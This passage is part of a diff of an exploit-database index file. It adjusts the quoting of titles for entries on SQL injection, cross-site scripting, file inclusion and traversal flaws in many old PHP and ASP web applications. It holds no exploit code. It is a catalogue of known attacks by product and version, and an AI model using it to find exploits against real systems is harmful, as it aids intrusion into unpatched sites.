Inclusion",2006-06-02,Canberx,php,webapps,0 27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 -27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0 +27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - 'editpost.php' SQL Injection",2006-06-05,DarkFig,php,webapps,0 27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 - 'Username' SQL Injection",2006-06-05,FarhadKey,php,webapps,0 27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - 'comments.php' SQL Injection",2006-06-05,ajann,php,webapps,0 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 - 'index.php' Cross-Site Scripting",2006-06-06,Luny,php,webapps,0 @@ -30223,8 +30224,8 @@ id,file,description,date,author,platform,type,port 28010,platforms/php/webapps/28010.txt,"Five Star Review Script - 'report.php?item_id' Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 28011,platforms/php/webapps/28011.txt,"iFoto 0.20 - 'index.php' Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 28012,platforms/php/webapps/28012.txt,"Foing 0.x - Remote File Inclusion",2006-06-12,Darkfire,php,webapps,0 -28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 - list.php Cross-Site Scripting",2006-06-12,Aesthetico,php,webapps,0 -28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 - detail.php Directory Traversal",2006-06-12,Aesthetico,php,webapps,0 +28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 - 'list.php' Cross-Site Scripting",2006-06-12,Aesthetico,php,webapps,0 +28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 - 'detail.php' Directory Traversal",2006-06-12,Aesthetico,php,webapps,0 28015,platforms/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,php,webapps,0 28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusions",2006-06-13,R@1D3N,php,webapps,0 28017,platforms/php/webapps/28017.txt,"CEScripts (Multiple Scripts) - Cross-Site Scripting",2006-06-13,Luny,php,webapps,0 @@ -30233,16 +30234,16 @@ id,file,description,date,author,platform,type,port 28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'index.php' imgdir Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 -28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 - FTP_index.php Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0 +28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 - 'FTP_index.php' Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0 28024,platforms/php/webapps/28024.txt,"phpBB - 'BBRSS.php' Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0 28025,platforms/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,php,webapps,0 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusions",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 28060,platforms/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps,0 28059,platforms/php/webapps/28059.txt,"SaphpLesson 1.1/2.0/3.0 - Multiple SQL Injections",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 -28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 - Login1.php Cross-Site Scripting",2006-06-15,"Federico Fazzi",php,webapps,0 -28032,platforms/php/webapps/28032.txt,"MPCS 0.2 - comment.php Cross-Site Scripting",2006-03-06,Luny,php,webapps,0 -28033,platforms/php/webapps/28033.txt,"VBZoom 1.11 - forum.php SQL Injection",2006-06-15,CrAsh_oVeR_rIdE,php,webapps,0 +28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 - 'Login1.php' Cross-Site Scripting",2006-06-15,"Federico Fazzi",php,webapps,0 +28032,platforms/php/webapps/28032.txt,"MPCS 0.2 - 'comment.php' Cross-Site Scripting",2006-03-06,Luny,php,webapps,0 +28033,platforms/php/webapps/28033.txt,"VBZoom 1.11 - 'forum.php' SQL Injection",2006-06-15,CrAsh_oVeR_rIdE,php,webapps,0 28034,platforms/php/webapps/28034.txt,"Ji-takz - Remote File Inclusion",2006-06-16,SpC-x,php,webapps,0 28035,platforms/php/webapps/28035.txt,"mcGuestbook 1.3 - 'admin.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 28036,platforms/php/webapps/28036.txt,"mcGuestbook 1.3 - 'ecrire.php?lang' Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 @@ -30250,23 +30251,23 @@ id,file,description,date,author,platform,type,port 28038,platforms/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Inclusions",2006-06-16,CrAsh_oVeR_rIdE,php,webapps,0 28039,platforms/php/webapps/28039.txt,"dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28040,platforms/php/webapps/28040.txt,"dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28041,platforms/php/webapps/28041.txt,"dotWidget for articles 2.0 - 'admin/authors.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 -28042,platforms/php/webapps/28042.txt,"dotWidget for articles 2.0 - 'admin/articles.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 -28043,platforms/php/webapps/28043.txt,"dotWidget for articles 2.0 - 'admin/index.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 -28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 - 'admin/categories.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 -28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - search.php Cross-Site Scripting",2006-06-19,securityconnection,php,webapps,0 +28041,platforms/php/webapps/28041.txt,"dotWidget for articles 2.0 - '/admin/authors.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28042,platforms/php/webapps/28042.txt,"dotWidget for articles 2.0 - '/admin/articles.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28043,platforms/php/webapps/28043.txt,"dotWidget for articles 2.0 - '/admin/index.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 - '/admin/categories.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - 'search.php' Cross-Site Scripting",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 - 'index.php' Cross-Site Scripting",2006-03-06,alijsb,php,webapps,0 28066,platforms/php/webapps/28066.txt,"Singapore 0.9.x/0.10 - Multiple Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 28067,platforms/php/webapps/28067.txt,"Singapore 0.9.x/0.10 - 'index.php' template Parameter Cross-Site Scripting",2006-06-19,simo64,php,webapps,0 -28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - 'mail/index.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - 'mail/reply.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - '/mail/index.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 +28069,platforms/php/webapps/28069.txt,"V3 Chat Instant Messenger - '/mail/reply.php?id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28070,platforms/php/webapps/28070.txt,"V3 Chat Instant Messenger - 'online.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28071,platforms/php/webapps/28071.txt,"V3 Chat Instant Messenger - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-20,Luny,php,webapps,0 28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger - 'profile.php?site_id' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - 'profileview.php?membername' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - 'expire.php?cust_name' Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 -28076,platforms/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - member.php Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 +28076,platforms/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - 'member.php' Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 - 'Subject' HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 28088,platforms/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection",2006-06-22,Silitix,php,webapps,0 @@ -30281,7 +30282,7 @@ id,file,description,date,author,platform,type,port 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusions",2006-06-22,Shm,php,webapps,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 -28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 +28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - 'Thumb.php' Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 28104,platforms/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 28105,platforms/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusions",2006-06-16,Kw3[R]Ln,php,webapps,0 @@ -30293,7 +30294,7 @@ id,file,description,date,author,platform,type,port 28112,platforms/php/webapps/28112.txt,"OpenGuestbook 0.5 - 'view.php?offset' SQL Injection",2006-06-26,simo64,php,webapps,0 28113,platforms/php/webapps/28113.txt,"cPanel 10.8.1/10.8.2 - OnMouseover Cross-Site Scripting",2006-06-27,MexHackTeam.org,php,webapps,0 28114,platforms/php/webapps/28114.txt,"CrisoftRicette 1.0 - 'Cookbook.php' Remote File Inclusion",2006-06-27,CrAzY.CrAcKeR,php,webapps,0 -28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - admin.php Cross-Site Scripting",2006-06-27,botan,php,webapps,0 +28115,platforms/php/webapps/28115.txt,"MF Piadas 1.0 - 'admin.php' Cross-Site Scripting",2006-06-27,botan,php,webapps,0 28116,platforms/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,java,webapps,0 28117,platforms/php/webapps/28117.txt,"MF Piadas 1.0 - 'admin.php' Remote File Inclusion",2006-06-27,botan,php,webapps,0 28119,platforms/php/webapps/28119.txt,"vCard PRO - 'gbrowse.php?cat_id' SQL Injection",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 @@ -30307,8 +30308,8 @@ id,file,description,date,author,platform,type,port 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-06-29,securityconnection,php,webapps,0 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple SQL Injections",2006-06-29,securityconnection,php,webapps,0 -28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO - 'inc/rss_feed.php?category' SQL Injection",2006-06-29,securityconnection,php,webapps,0 -28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.php SQL Injection",2006-06-23,DarkFig,php,webapps,0 +28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO - '/inc/rss_feed.php?category' SQL Injection",2006-06-29,securityconnection,php,webapps,0 +28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - 'Diver.php' SQL Injection",2006-06-23,DarkFig,php,webapps,0 28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 @@ -30341,10 +30342,10 @@ id,file,description,date,author,platform,type,port 28174,platforms/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",php,webapps,0 28175,platforms/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",linux,webapps,0 28176,platforms/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-06,"Security News",php,webapps,0 -28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28177,platforms/php/webapps/28177.txt,"ATutor 1.5.x - '/documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28178,platforms/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 -28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - 'admin/fix_content.php?submit' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28179,platforms/php/webapps/28179.txt,"ATutor 1.5.x - '/users/browse.php' cat Parameter Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 +28180,platforms/php/webapps/28180.txt,"ATutor 1.5.x - '/admin/fix_content.php?submit' Cross-Site Scripting",2006-07-06,"Security News",php,webapps,0 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php?cat_id' SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28190,platforms/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,php,webapps,0 @@ -30354,9 +30355,9 @@ id,file,description,date,author,platform,type,port 28195,platforms/php/webapps/28195.txt,"RW::Download - 'stats.php' Remote File Inclusion",2006-07-08,StorMBoY,php,webapps,0 28199,platforms/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - 'Tiny_mce_gzip.php' Directory Traversal",2006-07-10,armin390,php,webapps,0 -28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 +28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - 'Topics.php' SQL Injection",2006-07-10,Paisterist,php,webapps,0 28203,platforms/asp/webapps/28203.txt,"Hosting Controller 1.x - error.asp Cross-Site Scripting",2006-07-11,Dea7h,asp,webapps,0 -28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 - add.php SQL Injection",2006-07-11,C.B.B.L,php,webapps,0 +28204,platforms/php/webapps/28204.txt,"SaPHPLesson 2.0 - 'add.php' SQL Injection",2006-07-11,C.B.B.L,php,webapps,0 28205,platforms/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",php,webapps,0 28206,platforms/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - Guestbook.php HTML Injection",2006-07-11,omnipresent,php,webapps,0 28208,platforms/asp/webapps/28208.txt,"FlexWATCH 3.0 - AIndex.asp Authentication Bypass",2006-07-12,"Jaime Blasco",asp,webapps,0 @@ -30396,20 +30397,20 @@ id,file,description,date,author,platform,type,port 28276,platforms/php/webapps/28276.txt,"PHP Pro Bid 5.2.4 - 'categories.php?orderType' SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 28278,platforms/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",jsp,webapps,0 28279,platforms/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - Cross-Site Request Forgery",2013-09-14,"Matias Mingorance Svensson",hardware,webapps,0 -28280,platforms/php/webapps/28280.txt,"wwwThreads - calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 +28280,platforms/php/webapps/28280.txt,"wwwThreads - 'calendar.php' Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - 'auction_room.php?ar' SQL Injection",2006-07-26,l2odon,php,webapps,0 28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - 'auction_store.php?u' SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 -28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 +28294,platforms/php/webapps/28294.txt,"PHP-Nuke - 'INP modules.php' Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 28295,platforms/php/webapps/28295.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-comments-post.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28296,platforms/php/webapps/28296.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-feed.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28297,platforms/php/webapps/28297.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-trackback.php' Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 28302,platforms/php/webapps/28302.txt,"Joomla! Component Liga Manager Online 2.0 - Remote File Inclusion",2006-07-30,vitux.manis,php,webapps,0 -28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - Protect.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 -28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 +28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - 'Protect.php' SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 +28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - 'top.php' SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 - 'operator_chattranscript.php?chatid' Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,php,webapps,0 @@ -30417,7 +30418,7 @@ id,file,description,date,author,platform,type,port 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 -28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 +28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php?subdir' Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 @@ -30447,7 +30448,7 @@ id,file,description,date,author,platform,type,port 28359,platforms/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0 -28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 +28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - 'profile.php' Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - 'Big.php' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 @@ -30455,7 +30456,7 @@ id,file,description,date,author,platform,type,port 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 -28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 +28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - 'edit.php' Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusions",2006-08-15,Crackers_Child,php,webapps,0 @@ -30479,7 +30480,7 @@ id,file,description,date,author,platform,type,port 28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - TCMS_Administer Parameter Remote File Inclusion",2006-08-21,You_You,php,webapps,0 28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,php,webapps,0 -28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 +28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - 'Getad.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 - 'index.php' Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - 'HPEInc' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 @@ -30492,19 +30493,19 @@ id,file,description,date,author,platform,type,port 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 -28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 +28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - 'hlstats.php' Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusions",2006-08-29,sCORPINo,php,webapps,0 -28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 +28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - 'comments.php' SQL Injection",2006-08-30,Hessam-x,php,webapps,0 28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass",2006-07-25,HoangYenXinhDep,php,webapps,0 28443,platforms/asp/webapps/28443.html,"Digiappz Freekot 1.01 - ASP SQL Injection",2006-08-30,FarhadKey,asp,webapps,0 28444,platforms/php/webapps/28444.txt,"Alstrasoft Template Seller - 'Config[Template_Path]' Multiple Remote File Inclusions",2006-08-30,night_warrior771,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 -28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 -28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - 'admin/newsletters.php' page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - 'admin/orders_status.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - 'admin/products_attributes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 -28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 